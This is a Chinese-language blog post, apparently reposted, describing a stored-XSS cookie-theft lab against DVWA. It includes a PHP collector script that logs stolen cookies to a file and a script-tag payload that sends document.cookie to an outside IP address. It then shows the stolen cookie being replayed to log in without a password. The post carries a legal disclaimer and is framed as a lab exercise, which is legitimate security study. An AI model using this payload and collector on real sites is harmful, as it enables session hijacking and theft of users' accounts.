码迷,mamicode.com
首页 > 其他好文 > 详细

存储型xss盗取cookie实验

时间:2018-04-18 21:57:19      阅读:236      评论:0      收藏:0      [点我收藏+]

标签:xss   DVWA   

声明:仅供交流使用,严禁违法犯罪,否则后果自负

1,准备接收cookie的环境:

    

ip为172.24.10.105

代码为:保存为 getCookie.php

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
echo "攻击成功";
?>


2,在实验环境插入js代码:

<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>


通过审查元素把限制取消,然后插入js代码

技术分享图片

技术分享图片

然后重新访问这个页面发现进行了跳转

技术分享图片

并在接收cookie的平台看到了cookie

技术分享图片



换一个浏览器设置cookie



技术分享图片



直接访问:

http://127.0.0.1/DVWA/

无需密码登录成功

技术分享图片






欢迎关注微信公众号

技术分享图片

存储型xss盗取cookie实验

标签:xss   DVWA   

原文地址:http://blog.51cto.com/tdcqvip/2105099

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!